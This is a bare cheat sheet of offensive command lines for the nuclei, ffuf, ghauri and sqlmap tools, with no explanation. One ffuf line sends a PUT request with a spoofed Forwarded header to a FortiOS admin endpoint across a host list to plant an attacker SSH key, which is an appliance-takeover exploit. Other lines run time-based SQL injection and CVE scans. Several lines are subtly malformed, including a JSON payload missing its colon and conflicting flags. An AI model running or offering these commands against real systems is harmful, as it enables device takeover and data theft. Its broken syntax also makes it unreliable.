Nuclei Command
~ > nuclei -a ransomsec -target /tmp/dangerous-shell.sh
~ > nuclei -l ./targets.txt -t ./CVE-2022-35405.yaml


FFUF Command
~ > ffuf -u https://codingo.io/FUZZ -w ./wordlist -recursion -e .bak
~ > ffuf -u https://rendering-prd.redacted.com/FUZZ -w english-words.txt -mc all -fw 6
~ > ffuf -w "host_list.txt:URL" -u "https://URL/api/v2/cmdb/system/admin/admin" -x PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1]:8000";by="[127.0.0.1]:9000;' -d '{"ssh-public-key1" "h4x0r"}' -mr "SSH" -r -x http://127.0.0.1:8080

Ghauri Command
~ > ghauri -r sqli-req.txt --dbms=MySQL --technique=T --current-db

SQLMAP Command
~ > sqlmap -r sqli-req.txt --current-db --technique=T --dbms=MySQL --level=2 --risk=3 --random-agent --no-cast







